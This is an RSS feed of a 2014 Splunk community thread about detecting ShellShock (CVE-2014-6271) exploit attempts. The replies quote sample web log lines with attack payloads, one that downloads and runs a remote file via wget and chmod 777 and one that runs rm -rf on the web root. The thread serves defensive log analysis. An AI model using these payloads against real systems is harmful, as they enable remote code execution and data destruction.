<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Re: How to use Splunk to detect ShellShock exploit attempts? in Splunk Search</title>
    <link>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152224#M42668</link>
    <description>&lt;P&gt;Some other examples and good discussion: &lt;A href="http://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-logs"&gt;http://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-logs&lt;/A&gt; &lt;/P&gt;

&lt;P&gt;Weblog Sample:&lt;/P&gt;

&lt;PRE&gt;&lt;CODE&gt;10.11.12.13 - - [25/Sep/2014:16:00:00 -0400] "GET /cgi-bin/testing.cgi HTTP/1.0" 200 1 "-" "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/rm -rf /var/www/"    
&lt;/CODE&gt;&lt;/PRE&gt;

&lt;P&gt;Unix Log Sample:&lt;/P&gt;

&lt;PRE&gt;&lt;CODE&gt;[Thu Sep 25 16:00:00 2014] [error] [client 10.11.12.13] /bin/rm: cannot remove `/var/www/icons/pie0.png': Permission denied
&lt;/CODE&gt;&lt;/PRE&gt;</description>
    <pubDate>Sun, 05 Oct 2014 20:44:19 GMT</pubDate>
    <dc:creator>mmaier_splunk</dc:creator>
    <dc:date>2014-10-05T20:44:19Z</dc:date>
    <item>
      <title>How to use Splunk to detect ShellShock exploit attempts?</title>
      <link>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152222#M42666</link>
      <description>&lt;P&gt;Let me start by saying I am brand new to Splunk, and not a programmer by profession, but I am surprised that this question has not been discussed. "What query would I run to see if someone has used the ShellShock vulnerability to attack my system?"&lt;/P&gt;

&lt;P&gt;I think there must be an answer because the blog discussion on how to ensure that all devices are patched for ShellShock starts with the following:&lt;BR /&gt;
"I’ll let others tell you how you could use Splunk to search through your various logs for evidence that evildoers are trying to exploit this in your environment."&lt;/P&gt;

&lt;P&gt;Thanks&lt;/P&gt;</description>
      <pubDate>Sun, 05 Oct 2014 20:18:07 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152222#M42666</guid>
      <dc:creator>jkhsplunkuser</dc:creator>
      <dc:date>2014-10-05T20:18:07Z</dc:date>
    </item>
    <item>
      <title>Re: How to use Splunk to detect ShellShock exploit attempts?</title>
      <link>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152223#M42667</link>
      <description>&lt;P&gt;Hi,&lt;/P&gt;

&lt;P&gt;possible you can review the logs of your web server.&lt;/P&gt;

&lt;P&gt;search for unix similar expressions like... chmod 777,echo, ls, cd etc.&lt;/P&gt;

&lt;P&gt;Sample Log:&lt;/P&gt;

&lt;PRE&gt;&lt;CODE&gt;192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0"  400 349 "() { :; }; wget -O /tmp/besh &lt;A href="http://192.168.1.1/filename" target="test_blank"&gt;http://192.168.1.1/filename&lt;/A&gt;; chmod 777  /tmp/besh; /tmp/besh;"
&lt;/CODE&gt;&lt;/PRE&gt;

&lt;P&gt;Source: &lt;A href="https://securelist.com/blog/research/66673/bash-cve-2014-6271-vulnerability-qa-2/+"&gt;https://securelist.com/blog/research/66673/bash-cve-2014-6271-vulnerability-qa-2/&lt;/A&gt; &lt;/P&gt;

&lt;P&gt;Br&lt;BR /&gt;
Matthias&lt;/P&gt;</description>
      <pubDate>Sun, 05 Oct 2014 20:33:30 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152223#M42667</guid>
      <dc:creator>mmaier_splunk</dc:creator>
      <dc:date>2014-10-05T20:33:30Z</dc:date>
    </item>
    <item>
      <title>Re: How to use Splunk to detect ShellShock exploit attempts?</title>
      <link>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152224#M42668</link>
      <description>&lt;P&gt;Some other examples and good discussion: &lt;A href="http://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-logs"&gt;http://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-logs&lt;/A&gt; &lt;/P&gt;

&lt;P&gt;Weblog Sample:&lt;/P&gt;

&lt;PRE&gt;&lt;CODE&gt;10.11.12.13 - - [25/Sep/2014:16:00:00 -0400] "GET /cgi-bin/testing.cgi HTTP/1.0" 200 1 "-" "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/rm -rf /var/www/"    
&lt;/CODE&gt;&lt;/PRE&gt;

&lt;P&gt;Unix Log Sample:&lt;/P&gt;

&lt;PRE&gt;&lt;CODE&gt;[Thu Sep 25 16:00:00 2014] [error] [client 10.11.12.13] /bin/rm: cannot remove `/var/www/icons/pie0.png': Permission denied
&lt;/CODE&gt;&lt;/PRE&gt;</description>
      <pubDate>Sun, 05 Oct 2014 20:44:19 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152224#M42668</guid>
      <dc:creator>mmaier_splunk</dc:creator>
      <dc:date>2014-10-05T20:44:19Z</dc:date>
    </item>
    <item>
      <title>Re: How to use Splunk to detect ShellShock exploit attempts?</title>
      <link>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152225#M42669</link>
      <description>&lt;P&gt;&lt;A href="http://blogs.splunk.com/2014/09/24/finding-shellshock-cve-2014-6271-with-splunk-forwarders/"&gt;http://blogs.splunk.com/2014/09/24/finding-shellshock-cve-2014-6271-with-splunk-forwarders/&lt;/A&gt;&lt;/P&gt;</description>
      <pubDate>Mon, 06 Oct 2014 03:06:47 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152225#M42669</guid>
      <dc:creator>gkanapathy</dc:creator>
      <dc:date>2014-10-06T03:06:47Z</dc:date>
    </item>
    <item>
      <title>Re: How to use Splunk to detect ShellShock exploit attempts?</title>
      <link>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152226#M42670</link>
      <description>&lt;P&gt;Thanks.  The discussion at this link is a big help.&lt;/P&gt;</description>
      <pubDate>Mon, 06 Oct 2014 16:20:22 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152226#M42670</guid>
      <dc:creator>jkhsplunkuser</dc:creator>
      <dc:date>2014-10-06T16:20:22Z</dc:date>
    </item>
  </channel>
</rss>

